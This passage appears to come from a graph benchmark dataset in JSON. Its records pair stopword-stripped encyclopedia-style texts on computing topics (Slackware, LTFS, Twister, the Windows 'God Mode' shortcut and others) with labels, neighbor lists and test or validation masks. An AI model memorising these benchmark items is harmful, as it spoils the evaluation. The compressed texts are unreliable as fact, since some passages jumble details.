ibm committed associative arrays future versions vue language long development lead time dtrace probevue dtrace considerably probe point specifications ibm plans add considerable number new probe points future technology level releases aix 6.1 next major aix release",
    "neighbors": [
      1152,
      5222,
      10413,
      10510,
      11632,
      11506,
      3323,
      2045,
      3615
    ],
    "mask": "Test"
  },
  {
    "node_id": 10149,
    "label": 3,
    "text": "Slackware:slackware slackware linux distribution created patrick volkerding 1993 originally based softlanding linux system slackware basis many linux distributions notably first versions suse linux distributions oldest distribution still maintained slackware aims design stability simplicity unix-like linux distribution makes modifications possible software packages upstream tries anticipate use cases preclude user decisions contrast modern linux distributions slackware provides graphical installation procedure automatic dependency resolution software packages uses plain text files small set shell scripts configuration administration without modification boots command-line interface environment many conservative simplistic features slackware often considered suitable advanced technically inclined linux users slackware available ia-32 x86_64 architectures port arm architecture slackware mostly free open source software formal bug tracking facility public code repository releases periodically announced volkerding formal membership procedure developers volkerding primary contributor releases name slackware stems fact distribution started private side project intended commitment prevent taken seriously first volkerding gave humorous name stuck even slackware became serious project slackware refers pursuit slack tenet church subgenius parody religion certain aspects slackware graphics reflect this—the pipe tux smoking influenced image j. r. bob dobbs head humorous reference church subgenius found many versions install.end text files indicate end software series setup program recent versions including slackware release 14.1 text rot13 obfuscated slackware originally derived softlanding linux system sls popular original linux distributions first offer comprehensive software collection comprised kernel basic utilities including x11 graphical interface tcp/ip uucp networking gnu emacs patrick volkerding started sls needing lisp interpreter school project named moorhead state university msu found clisp available linux downloaded sls run weeks later volkerding asked artificial intelligence professor msu show install linux home computers school volkerding made notes describing fixes issues found installing sls professor went applied changes new installation however took almost long took install sls professor asked install disks could adjusted fixes could applied installation start slackware volkerding continued making improvements sls fixing bugs upgrading software automatic installation shared libraries kernel image fixing file permissions short time volkerding upgraded around half packages beyond sls available volkerding intentions provide modified sls version public friends msu urged put sls modifications onto ftp server volkerding assumed sls would putting new version included things soon enough held weeks time many sls users internet asking sls new release eventually volkerding made post titled anyone want sls-like 0.99pl11a system received many positive responses discussion local sysadmin msu volkerding obtained permission upload slackware university ftp server first slackware release version 1.00 distributed july 17 1993 00:16:36 utc supplied 24 3½ floppy disk images announcement made volkerding watched flood ftp connections continually crashed server soon afterwards walnut creek cdrom offered additional archive space ftp servers size slackware quickly increased addition included software version 2.1 released october 1994 tripled comprise 73 1.44m floppy disk images 1999 slackware saw version jump 4 7 slackware version numbers lagging behind distributions led many users believe date even though bundled software versions similar volkerding made decision bump version marketing effort show slackware up-to-date linux distributions many release numbers 6 time chose 7 estimating distributions would soon release number april 2004 patrick volkerding added x.org server packages testing/ directory -current replacement xfree86 packages currently used request comments future x window system slackware month later switched xfree86 x.org server stating opinions 4 1 favor using x.org release default version x stated decision primarily technical one xfree86 proving cause compatibility problems slackware 10.0 first release x.org server march 2005 patrick volkerding announced removal gnome desktop environment development changelog stated consideration 4 years already projects provided complete version gnome slackware slackware provided volkerding stated future gnome support would rely community community responded october 2016 several active gnome projects slackware include cinnamon dlackware dropline gnome mate slackmate removal deemed significant linux community due prevalence gnome many distributions may 2009 patrick volkerding announced public development release official x86_64 variant called slackware64 maintained parallel ia-32 distribution slackware64 pure 64-bit distribution support running compiling 32-bit programs however designed multilib-ready eric hameleers one core slackware team members maintains multilib repository contains necessary packages convert slackware64 multilib enable running 32-bit software hameleers started 64-bit port diversion pain recovering surgery september 2008 volkerding tested port december 2008 impressed saw speed increases 20 40 percent benchmarks compared 32-bit version minimize extra effort maintaining versions parallel slackware build scripts called slackbuilds slowly transitioned supporting either architecture allowing one set sources versions slackware64 saw first stable release version 13.0 november 2013 release 14.1 june 2016 slackware saw 31-month gap releases marking longest span release history time development branch went without updates 47 days however april 21 2015 patrick volkerding apologized changelog absence updates stated development team used time get good work done 700 program changes listed changelog entry including many major library upgrades january 2016 volkerding announced reluctant addition pulseaudio primarily due bluez dropping direct alsa support v5.x various projects turn dropping support bluez v4.x knowing users would happy change stated bug reports complaints threats go changes culminated release slackware 14.2 june 2016 design philosophy slackware oriented toward simplicity software purity core design emphasizes lack change upstream sources many design choices slackware seen heritage simplicity traditional unix systems examples kiss principle context simple refers simplicity system design rather system usage thus ease use may vary users lacking knowledge command line interfaces classic unix tools may experience steep learning curve using slackware whereas users unix background may benefit less abstract system environment keeping slackware design philosophy spirit purity software slackware uses original configuration mechanisms supplied software authors however administrative tasks distribution-specific configuration tools delivered formal issue tracking system official procedure become code contributor developer project maintain public code repository bug reports contributions essential project managed informal way final decisions going included slackware release strictly remain slackware benevolent dictator life patrick volkerding first versions slackware developed patrick volkerding alone beginning version 4.0 official slackware announce files list david cantrell logan johnson part slackware team later announce statements release version 8.1 include chris lumens lumens johnson cantrell also authors first edition slackware linux essentials official guide slackware linux slackware website mentions chris lumens david cantrell slackware alumni worked full-time slackware project several years release notes slackware 10.0 10.1 volkerding thanks eric hameleers work supporting usb pci cardbus wireless cards starting version 12.0 second time team building around volkerding according release notes 12.2 development team consists seven people future versions added people since version 13.0 slackware team seems core members eric hameleers gives insight core team essay history slackware development written october 3–4 2009 shortly release version 13.0 slackware package management system collectively known pkgtools administer install upgrade remove packages local sources also uncompress create packages official tool update slackware network internet originally developed piter punk unofficial way keep slackware up-to-date officially included main tree slackware 12.2 included since slackware 9.1 package upgraded install new package old one remove files longer exist new package running confirms version numbers different thus allowing downgrading package desired slackware packages tarballs compressed using various methods starting 13.0 packages compressed using xz based lzma compression algorithm utilizing filename extension prior 13.0 packages compressed using gzip based deflate compression algorithm using extension support bzip2 lzma compression also added using filename extensions respectively although commonly used packages contain files program well additional metadata files used package manager package tarball contains full directory structure files meant extracted system root directory installation additional metadata files located special directory within tarball usually include file specifically formatted text file read package manager provide users description packaged software well file post-unpacking shell script allowing creation symbolic links preserving permissions startup files proper handling new configuration files aspects installation ca n't implemented via package directory structure package manager maintains directory package installed corresponding install log file lists package size compressed uncompressed software description full path files installed also maintains directory containing files allow proper removal installed symlinks package removed upgraded old install logs files moved respectively making possible review previous packages see removed package management system track manage dependencies however performing recommended full install dependencies stock packages met custom installations 3rd-party packages slackware relies user ensure system supporting system libraries programs required program since official lists dependencies stock packages provided users decide install custom installation install 3rd-party software need work possible missing dependencies since package manager n't manage dependencies install packages whether dependencies met user may find dependencies missing attempting use software slackware incorporate official tools resolve dependencies unofficial community-supported software tools provide function similar way apt debian-based distributions yum red hat-based distributions include official repositories slackware official packages slackware provides available installation media however many third-party repositories slackware standalone repositories others distributions slackware-based retain package compatibility slackware many searched using pkgs.org linux package search engine however mixing matching dependencies multiple repositories lead two packages require different versions dependency form dependency hell slackware wo n't provide dependency resolution packages however projects provide list dependencies included slackware files package commonly extension due possibility dependency issues many users choose compile programs using community-provided slackbuilds slackbuilds shell scripts create installable slackware package provided software tarball since slackbuilds scripts n't limited compiling program source also used repackage pre-compiled binaries provided projects distributions repositories proper slackware packages slackbuilds compile sources several advantages pre-built packages since build original author source code user trust third-party packager furthermore local compilation process allows machine-specific optimization comparison manual compilation installation software slackbuilds provide cleaner integration system utilizing slackware package manager slackbuilds come additional file metadata allows automated tools download source verify source corrupted calculate additional dependencies part slackware repositories include slackbuilds resulting slackware packages allowing users either build install pre-built package officially endorsed slackbuilds repository slackbuilds.org commonly referred sbo community-supported project offering slackbuilds building software included slackware users able submit new slackbuilds software site approved become package maintainer responsible providing updates slackbuild either fix issues build newer versions provided upstream ensure programs compiled used required dependencies software included slackware required documented available site submissions tested site administrators added repository administrators intend build process nearly identical way slackware official packages built mainly ensure volkerding sympathetic cause allows slackbuilds volkerding deems worthy pulled regular slackware minimal changes script also prevent users suggesting volkerding change scripts match sbo sbo provides templates slackbuilds additional metadata files encourage package maintainers deviate unless necessary two slackware team members eric hameleers robby workman repository pre-compiled packages along slackbuilds source files used create packages packages additional software included slackware felt worth time maintain packages used testbed future upgrades slackware notably hameleers provides ktown packages newer versions kde also maintains slackware multilib repository enabling slackware64 run compile 32bit packages slackware release policy follows feature stability based release cycle contrast time-bound e.g ubuntu rolling release e.g gentoo linux schemes linux distributions means set time expect release volkerding release next version feels suitable number changes previous version made changes lead stable environment stated patrick volkerding usually policy speculate release dates since — pure speculation always possible know long take make upgrades needed tie related loose ends things built upcoming release 'll uploaded -current tree throughout slackware history generally try deliver up-to-date software least annual basis however slackware 14.1 14.2 2-year gap releases inception 2014 2015 slackware least one release per year release activity peaked 1994 1995 1997 1999 three releases year starting version 7.1 june 22 2000 release progression became stable tended occur year since years two releases 2003 2005 2008 slackware latest 32bit x86 64bit x86_64 stable releases version 14.2 released june 30 2016 include support linux 4.4.14 volkerding also maintains testing/developmental version slackware called -current used bleeding edge configuration version eventually become next stable release point volkerding start new -current start developing next release slackware version generally known stable possible things break -current tends recommended production systems currently slackware officially stated support term policy however june 14 2012 notices appeared changelogs versions 8.1 9.0 9.1 10.0 10.1 10.2 11.0 12.0 stating effective august 1 2012 security patches would longer provided versions oldest release version 8.1 released june 18 2002 10 years support reaching eol later august 30 2013 announcements made changelogs 12.1 12.2 stating eol december 9 2013 stated changelog entries least 5 years support april 6 2018 versions 13.0 13.1 13.37 declared reaching eol july 5 2018 stated changelog entries least 7 years support 13.0 supported almost 9 years announcements slackware team versions slackware 14.0 eol official announcements versions prior 8.1 longer maintained effectively eol historically slackware concentrated solely ia-32 architecture releases available 32-bit however starting slackware 13.0 64-bit x86_64 variant available officially supported symmetrical development 32-bit platform prior release slackware64 users wanting 64-bit required use unofficial ports slamd64 slackware also available ibm s/390 architecture form slack/390 arm architecture slackware arm originally known 'armedslack ports declared official patrick volkerding however s/390 port still version 10.0 stable version 11.0 testing/developmental version updates since 2009 also may 7 2016 developer slackware arm announced 14.1 eol september 1 2016 development -current cease release 14.2 however support 14.2 maintained foreseeable future eol announcement 14.1 added changelog june 25 2016 july 2016 developer slackware arm announced development build tools enhanced reduce manual effort involved maintaining arm port proceeded announce 32-bit hardware floating port development port released august 2016 current form slackintosh unofficial port slackware new world macintosh powerpc architecture slackintosh final release 12.1 longer maintained slackware iso images installation downloaded free slackware website via bittorrent various ftp http mirrors 6-cd set single dual-dvd previously available order slackware official store store currently unavailable official statement return cd set targeted 32bit ia-32 platform also runs 64bit x86_64 processors 32-bit mode dvd contains 32bit 64bit versions distributions ports arm architecture ibm s/390 neither available cd/dvds iso images downloaded slackware s/390 installs dos partition floppy disk slackware arm distribute iso files arm devices boot cd dvd instead installed network using das u-boot tftp boot server mini-root filesystem slackware arm also installed pc running qemu using technique 2019 distrowatch ranks slackware 34 interest appears peaked 2002 slackware rank reached 7 gradually slipped top 10 2010 appears stabilized around current rank 2015 however since distrowatch tracks visitors various distributions pages state ranking n't always correlate usage distribution popularity distribution site rankings used measure market share distributions linux distributions slackware official tracking system total unique installs active users",
    "neighbors": [
      4611,
      7685,
      3079,
      7689,
      9743,
      2064,
      3089,
      4113,
      6675,
      8209,
      10257,
      8727,
      5656,
      543,
      11297,
      7204,
      9253,
      5670,
      11305,
      6189,
      56,
      3129,
      4153,
      59,
      7228,
      8248,
      9276,
      4673,
      8258,
      10817,
      8772,
      3654,
      5190,
      3147,
      2125,
      593,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      9840,
      11388,
      9343,
      2692,
      8837,
      9353,
      657,
      9873,
      10387,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      11436,
      3245,
      7854,
      9902,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      7364,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      1245,
      4841,
      6890,
      7913,
      5356,
      237,
      6380,
      7914,
      7920,
      9964,
      6898,
      5363,
      9972,
      9461,
      1782,
      10480,
      5369,
      6393,
      3324,
      8957,
      4355,
      5380,
      11525,
      7435,
      2321,
      1813,
      3350,
      4887,
      5397,
      6934,
      8992,
      10016,
      10530,
      5923,
      6436,
      2853,
      10022,
      3369,
      823,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      10062,
      4437,
      9048,
      863,
      8033,
      2914,
      3428,
      5990,
      6502,
      9064,
      7020,
      7534,
      2417,
      9074,
      11121,
      11648,
      390,
      1416,
      905,
      3976,
      4493,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      6055,
      7082,
      8621,
      1455,
      6579,
      948,
      439,
      6583,
      10694,
      4039,
      9671,
      5067,
      975,
      4561,
      10195,
      9689,
      2010,
      9693,
      8675,
      485,
      1513,
      495,
      8177,
      8180,
      5110,
      4089,
      8700,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 10150,
    "label": 9,
    "text": "Variable_Assembly_Language:variable assembly language variable assembly language val computer-based control system language designed specifically use unimation inc. industrial robots val robot language permanently stored part val system includes programming language used direct system individual applications val language easy understand syntax uses clear concise generally self-explanatory instruction set commands communications robot consist easy understand word number sequences control programs written computer controls robot real-time system val continuous trajectory computation permits complex motions executed quickly efficient use system memory reduction overall system complexity val system continuously generates robot control commands simultaneously interact human operator permitting on-line program generation modification convenient feature val ability use libraries manipulation routines thus complex operations may easily quickly programmed combining predefined subtasks val language consists monitor commands program instructions monitor commands used prepare system execution user-written programs program instructions provide repertoire necessary create val programs controlling robot actions following terms frequently used val related operations val monitor administrative computer program oversees operation system accepts user input initiates appropriate response follows instructions user-written programs direct robot performs computations necessary control robot val editor aid entering information computer system modifying existing text used enter modify robot control programs list instructions telling computer something val programs written system users describe tasks robot perform location position object space orientation object locations used define positions orientations robot tool assume program execution several conventions apply numerical values supplied val commands instructions preceding monitor-command description two symbols indicating command typed user dot signifies command performed val top-level monitor mode user program executed system prompt dot asterisk indicates command performed time val executing program system prompt asterisk symbols present command executed either case monitor commands program instructions abbreviated entering monitor command program instruction function name abbreviated many characters necessary make name unique commands instructions angle brackets used enclose item describes actual argument appear thus programmer supply appropriate item position entering command instruction note brackets used clarification never included part command instruction many val commands instructions optional arguments notations optional arguments enclosed square brackets comma following argument comma must retained argument omitted unless nothing follows example monitor base command form specify 300-millimeter change z direction command could entered following ways note commas preceding number 300 must present correctly relate number z-direction change like angle brackets square brackets never entered part command instruction several types numerical arguments appear commands instructions type restrictions values accepted val following rules observed nearest representable value function val regulate control robot system following user commands instructions addition compact stand-alone system val designed highly interactive minimize programing time provide many programming aids possible standard val system uses operator console terminal manual control box input commands data user operator console serves primary communication device either direct play terminal printing terminal interaction devices automated cell typically handled monitoring input channels switching outputs means robot control modest cell without need programmable devices controller two levels operation prom memory retains contents finitely thus val immediately available controller switched monitor responsible control robot commands come manual control unit system terminal programs increase versatility flexibility val monitor perform commands even user program executed commands processed way include controlling status system defining robot locations storing retrieving information floppy disk creating editing robot control programs",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 10151,
    "label": 6,
    "text": "Linear_Tape_File_System:linear tape file system linear tape file system ltfs file system allows files stored magnetic tape accessed similar fashion disk removable flash drives requires specific format data tape media software provide file system interface data technology based around self-describing tape format developed ibm adopted lto consortium 2010 magnetic tape data storage used 50 years typically hold file metadata form easy access modify independent file content data often external databases used maintain file metadata file names timestamps directory hierarchy hold data external databases generally designed interoperability tapes might might contain index content unix-like systems tar interoperable standard well-suited allow modification file metadata independent modifying file content data maintain central index files provide filesystem interface characteristics ltfs technology first implemented ibm prototype running linux mac os x 2008/2009 prototype demonstrated nab 2009 based feedback initial demonstration experience within ibm filesystem overhauled preparation release product ltfs development team worked vendors lto tape products hp quantum build support understanding ltfs format filesystem implementation leading public release ltfs format specification filesystem implementation released april 12 2010 support ibm hp quantum lto consortium ltfs v2.0.0 released march 2011 improving text clarify remove ambiguity also added support sparse files persistent file identifiers virtual extended attributes filesystem metadata control defined minimum recommended blocksize values ltfs volumes compatibility across various hba hardware implementations version 2.0.0 defines rules version number may change future compatibility maintained across varying implementations implementations must august 2012 snia announced forming twg technical work group continue technical development specification ltfs format specification v 2.1 baseline technical work standards accreditation process snia ltfs twg members include hp ibm oracle quantum ltfs make tape appear behave like disk change fundamentally sequential nature tape files always appended end tape file modified overwritten removed volume associated tape blocks used freed simply marked unavailable used volume capacity recovered data deleted capacity recovered whole tape reformatted spite disadvantages several uses cases ltfs formatted tape superior disk data storage technologies lto seek times range 10 100 seconds streaming data transfer rate match exceed disk data transfer rates additionally lto cartridges easily transportable hold far data removable data storage format ability copy large file large selection files 1.5tb lto-5 2.5tb lto_6 ltfs formatted tape allows easy exchange data collaborator saving archival copy since ltfs open standard ltfs formatted tapes usable wide variety computing systems ibm linear tape file system single drive edition initially released ibm long term file system allows tapes formatted ltfs volume volumes mounted users applications access files directories stored tape directly including drag-and-drop files ibm linear tape file system library edition ltfs-le product allows ltfs volumes used tape library ltfs-formatted tape cartridge library appears separate folder filesystem mount point user application navigate folders access files stored tape ltfs-le software automatically controls tape library robotics load unload necessary ltfs volumes oracle free open source storagetek linear tape file system ltfs open edition software claimed first store 8.5tb native capacity single cartridge supports oracle ’ midrange storagetek lto 5 lto 6 tape drives hp ibm well oracle ’ storagetek t10000c t10000d tape drives oracle ’ storagetek ltfs-le software offering supports storagetek sl8500 modular library system storagetek sl3000 modular library system storagetek sl150 modular tape hp linear tape file system hp ltfs hp implementation free open source software application quantum corporation provides ltfs solution windows linux mac os x support scalar ltfs appliance file system presents quantum tape library nas share appliance makes files viewable resided local disk allows users drag drop files directly tape cartridge implementations",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      5356,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      5380,
      11012,
      5384,
      1801,
      2314,
      8461,
      6416,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      823,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      2948,
      8075,
      11675,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      11221,
      7126,
      1509,
      9189,
      11256,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 10152,
    "label": 7,
    "text": "CloudShare:cloudshare cloudshare cloud computing provider company formerly structures founded january 2007 israel headquartered san francisco california cloudshare combines aspects virtualization cloud computing advanced features offer software service saas similar virtual lab automation cloudshare makes full-featured virtual enterprise environments available online on-demand applications including developing testing pre-sales demos proofs-of-concept evaluations technical training development certification hardware software channel enablement customers create multi-machine environments cloud upload existing virtual machines cloudshare supports hypervisors vmware oracle virtualbox operating systems windows 7 ubuntu provides templates new machines operating systems even software microsoft sharepoint 2010 microsoft office 2010 ruby rails preinstalled created environments consist single virtual machine multiple networked machines able operate seamlessly user ’ physical pc workstation environments saved replicated shared additional users free interact independent replica “ snapshot ” cloudshare founded tel aviv israel january 2007 avner rosenan ophir kra-oz zvi guterman company originally named structures 2009 cloudshare moved headquarters san mateo california december 2009 cloudshare closed series b round funding receiving 10 million sequoia capital charles river ventures gemini capital bringing total venture capital funding 16 million 2014 zvi guterman bought company back sequoia capital took private",
    "neighbors": [
      4194,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 10153,
    "label": 3,
    "text": "Apple–Intel_architecture:apple–intel architecture apple–intel architecture mactel unofficial name used apple macintosh personal computers developed manufactured apple inc. use intel x86 processors rather powerpc motorola 68000 68k series processors used predecessors change architecture change firmware became necessary apple selected intel-designed extensible firmware interface efi comparable component open firmware used powerpc architectures firmware-based replacement pc bios intel change processor architecture x86 macs gained ability boot x86-native operating systems microsoft windows intel vt-x brought near-native virtualization mac os x host os apple–intel architecture mactel unofficial name used apple macintosh personal computers developed manufactured apple inc. use intel x86 processors name implies refers changes architecture earlier powerpc apple 68k preceding processors apple uses subset standard pc architecture provides support mac os x support operating systems hardware firmware components must supported run operating system apple-intel hardware include extensible firmware interface change architecture change firmware became necessary extensible firmware interface efi firmware-based replacement pc bios intel designed intel chosen apple replace open firmware used powerpc architectures since many operating systems windows xp many versions windows vista incompatible efi apple released firmware upgrade compatibility support module provides subset traditional bios support boot camp product guid partition table gpt standard layout partition table physical hard disk part extensible firmware interface efi standard proposed intel substitute earlier pc bios gpt replaces master boot record mbr used bios intel macs boot two ways directly via efi legacy bios compatibility mode multibooting holding option gives choice bootable devices refind bootloader commonly used added configurability standard live usbs used intel macs efi firmware recognize boot usb drives efi mode–when firmware switches bios mode longer recognizes usb drives due lack bios-mode usb driver many operating systems earlier versions windows linux booted bios mode easily booted perform better booted bios mode thus usb booting intel-based macs time largely limited mac os x easily booted via efi april 5 2006 apple made available download public beta version boot camp collection technologies allows users intel-based macs boot windows xp service pack 2 first non-beta version boot camp included mac os x v10.5 leopard introduction boot camp provides hardware drivers windows xp drivers xp difficult find linux also booted boot camp intel-based mac computers use similar hardware pcs manufacturers ship microsoft windows linux operating systems particular cpus chipsets gpus entirely compatible however apple computers also include custom hardware design choices found competing systems differences pose obstacles running macos non-apple hardware booting alternative operating systems mac computers – apple provides drivers custom hardware macos microsoft windows part boot camp drivers operating systems linux need written third parties usually volunteer free software enthusiasts digital rights management apple–intel architecture accomplished via dont steal mac os x.kext sometimes referred dsmos dsmosx file present intel-capable versions mac os x operating system presence enforces form digital rights management preventing mac os x installed stock pcs name kext reference mac os x license conditions allow installation apple hardware according apple anything else stealing mac os x kext located /system/library/extensions volume containing operating system extension contains kernel function called performs aes decryption apple-protected programs system lacking proper key able run apple-restricted binaries include initial announcement first intel-based mac hardware configurations reporting trusted platform module among system components believed tpm responsible handling drm protection later proven case keys actually contained within system management controller component exclusive apple computers easily retrieved two 32-byte keys form human-readable ascii string copyrighted apple establishing another possible line legal defence prospective clone makers intel core duo later including current i5 i7 xeon processors found intel macs support intel vt-x allowing high performance near native virtualization gives user ability run switch two operating systems simultaneously rather dual-boot run one operating system time first software take advantage technology parallels desktop mac released june 2006 parallels virtualization products allow users use installations windows xp later virtualized mode running os x. virtualbox virtualization software oracle corporation released january 2007 available mac os x well host operating systems supports intel vt-x run multiple guest operating systems including windows xp later available free charge either proprietary license gpl free software license used default running docker images operating systems vmware offers product similar parallels called fusion released august 2007 vmware virtualization product also allows users use installations windows xp later os x regardless product used inherent limitations performance penalties using virtualized guest os versus native mac os booting alternative os solution offered via boot camp",
    "neighbors": [
      6150,
      6153,
      6797,
      1042,
      533,
      4637,
      7326,
      10142,
      9762,
      7983,
      823,
      11447,
      7354,
      11257,
      2623,
      576,
      2525,
      2910,
      1632,
      4068,
      2149,
      4581,
      1515,
      2667,
      499,
      6771,
      9337,
      2811,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 10154,
    "label": 7,
    "text": "Twister_(software):twister software twister free software experimental peer-to-peer microblogging completely decentralized means one able shut single point attack system uses end-to-end encryption safeguard communications based bittorrent bitcoin-like protocols considered distributed twitter clone twister twitter-like microblogging platform utilizes blockchain technology bitcoin file exchange method bittorrent based p2p technologies twister experimental software alpha phase implemented distributed file sharing system user registration authentication provided bitcoin-like network completely distributed depend central authority distribution posts uses kademlia distributed hash table dht network bittorrent-like swarms provided libtorrent included versions bitcoin libtorrent highly patched intentionally interoperable already existing networks miguel freitas aiming build censor-resistant public posting platform began development twister july 2013 address concerns free speech privacy building work bitcoin bittorrent able core working october 2013 lucas leal hired create html css user interface miguel writing required javascript code 2,500 user accounts registered first six days operation completely decentralized network one capable incapacitating twister since unique point attack system twister uses end-to-end encryption protect communications furthermore twister designed prevent users knowing gsm localization ip address following users publish public messages microblogging platforms send direct messages private messages users protected unsolicited access brazilian computer engineer programmer miguel freitas started developing new social network learning massive spy programs usa national security agency nsa revealed nsa whistle-blower edward snowden started worry accessibility amount information control single company american jurisdiction according freitas twitter social network helped promote democracy organize protests magazine 'wired claims believes massive surveillance likes nsa makes dangerous provide personal information social networks currently exist reason decided build new system based privacy-preserving technology freitas used believe future social networks would based decentralized protocols central point control learning existing social networks already massively compromised state began take action development alternative service based closely twitter miguel developer lucas leal considered alpha version application android linux os x versions windows iphone ’ planned since open source free migrate application operating systems even though project moment alpha phase brian armstrong co-founder coinbase believes great example open protocol bitcoin used diverse purposes twister decentralized system instead networks kind like pump.io identi.ca statusnet gnu social diaspora n't require use server ’ require trust third one order use works peer-to-peer program achieved bitcoin protocol net used cryptocurrency basically protocol handles register users accesses way miners verify transactions bitcoin network secure one makes double spent twister network verifies users names messages belonging specific user really user messages driven bittorrent protocol allows keeping distribution system great number messages along network fast efficient way also allows users receive notifications almost instantly new messages alerts – without necessity central server since twister uses end-to-end encryption intercepted private direct messages read person apart addressee code used elliptic curve cryptography different one used nsa used bitcoin thought give security level similar rsa code 3072 bits data ’ stored anywhere ’ used cut consequence lose entry password impossible access private messages peer-to-peer system ’ central server publications may compiled see prism freitas explains system designed way users ’ know online ip address messages read information ’ registered anywhere despite freitas warns users anonymity may total depending circumstances twister developed linux environment freitas migrated successfully system android os x another long-term interesting objective would moving whole cryptographic code implementation interface user browser way users would capable accessing twister client platform use choosing third server still maintaining security private passwords times first twister prototype intended reproducing basic characteristics microblogging platform including private messages require addressee follower speaker common requisite existing platforms characteristics difficult implement completely decentralized system requiring effort includes arbitrary register words posts recompilation hashtaghs find main tendencies twister uses parameters elliptic curves bitcoin secp256k1.this ’ curve usually implicated nsa called sec256r1 256 bits public-key cryptography comprometido ecc must proportionate security similar key rsa 3072 bits least said experts usually stimulate people try break security systems something everyone desires money millions usd table coded keys secp256k1 bitcoin direct application messages encoding based example code published internet ladar levison lavabit known ladar took service denied cooperating us government allows control clients twister platform microblogging peer-to-peer means communication established computers without going central node would one recorded information company behind provides server machinery used detect case conversations people run node delete posts dht block account due fact messages sent directly user another without going central node also encrypted way – beginning end encrypted exit decrypted arrival – travel private way web black-box besides ip directions also protected application ip direction machine go internet recorded moment avoiding followed entity company according freitas guarantees anonymity mean ip ’ detected isp internet service provider content message ’ visible except spy knows decrypt breaking algorithms order 100 anonymous would use browser masks ip tor another one similar protecting spies",
    "neighbors": [
      8640,
      8674,
      3428,
      9732,
      3495,
      6344,
      6761,
      3629,
      6797,
      7887,
      7983,
      823,
      574,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 10155,
    "label": 2,
    "text": "SCSI_Pass_Through_Interface:scsi pass interface scsi pass interface spti application programming interface api accessing scsi device developed microsoft corporation part windows nt family operating systems storage port drivers provide interface win32 applications send scsi command descriptor block cdb messages scsi devices interfaces ioctl_scsi_pass_through ioctl_scsi_pass_through_direct applications build pass-through request send device using ioctl spti accessible windows software using deviceiocontrol windows api imgburn offers spti method accessing optical disc drives",
    "neighbors": [
      6240,
      8262,
      6797,
      7983,
      8976,
      3860,
      823,
      5754
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10156,
    "label": 2,
    "text": "USIX:usix usix discontinued unix-like computer operating system created system six inc. russia ineum institut elektronnykh upravlyaushikh mashin institute electronic control machines one leading software r organizations soviet union collapse funding system six operating system development closed",
    "neighbors": [
      6787,
      8713,
      11145,
      6412,
      7823,
      5267,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      7224,
      3129,
      9784,
      7483,
      1853,
      9151,
      10436,
      4039,
      6369,
      4076,
      5363,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 10157,
    "label": 1,
    "text": "SQL_Server_Management_Studio:sql server management studio sql server management studio ssms software application first launched microsoft sql server 2005 used configuring managing administering components within microsoft sql server successor enterprise manager sql 2000 tool includes script editors graphical tools work objects features server central feature ssms object explorer allows user browse select act upon objects within server also shipped separate express edition could freely downloaded however recent versions ssms fully capable connecting manage sql server express instance microsoft also incorporated backwards compatibility older versions sql server thus allowing newer version ssms connect older versions sql server instances also comes microsoft sql server express 2012 users download separately starting version 11 application based visual studio 2010 shell using wpf user interface versions 18 based visual studio 2017 isolated shell june 2015 microsoft announced intention release future versions ssms independently sql server database engine releases",
    "neighbors": [
      6797,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      4384,
      8227,
      11683,
      11559,
      4010,
      1964,
      7983,
      9263,
      11570,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9177,
      9434,
      603,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      9205,
      5754,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 10158,
    "label": 2,
    "text": "Windows_Master_Control_Panel_shortcut:windows master control panel shortcut windows master control panel shortcut labeled tasks also called windows god mode bloggers tasks folder least one microsoft developer short-cut access various control settings windows vista later operating systems including windows 10 creating folder certain name users access operating system control panels within single folder hack published outside microsoft documentation 2007 gained popularity name god mode used bloggers variations method access different settings also called “ god mode ” folders functionality discovered named master control panel god mode designed base folder searching control panel options using new start menu search function allows users type want e. g. “ change screen resolution ” get right control panel options search result shortcut implemented creating folder extension codice_1 godmode original folder name used feature publicised name used functionality achieved creating standard windows shortcut path codice_2 creating codice_3 file folder includes extension clsid class id general method creating shortcuts documented microsoft though microsoft publicized specific guid codice_4 master control panel third parties published method since least 2007 modest title “ registry hack vista control panel setting tasks one place ” numerous blogs tweets subject appeared december 2009 january 2010 “ windows 7 godmode ” many sites repeating information available elsewhere general folder shortcut format codice_5 codice_6 valid class id clsid system.applicationname entry windows registry technique documented microsoft “ using file system folders junction points ” clsid codice_7 particular interest associated widget allows access many windows settings microsoft documents guids regular control panel applets msdn cnet article attributed many guid shortcuts head microsoft windows division steven sinofsky pre-java 8 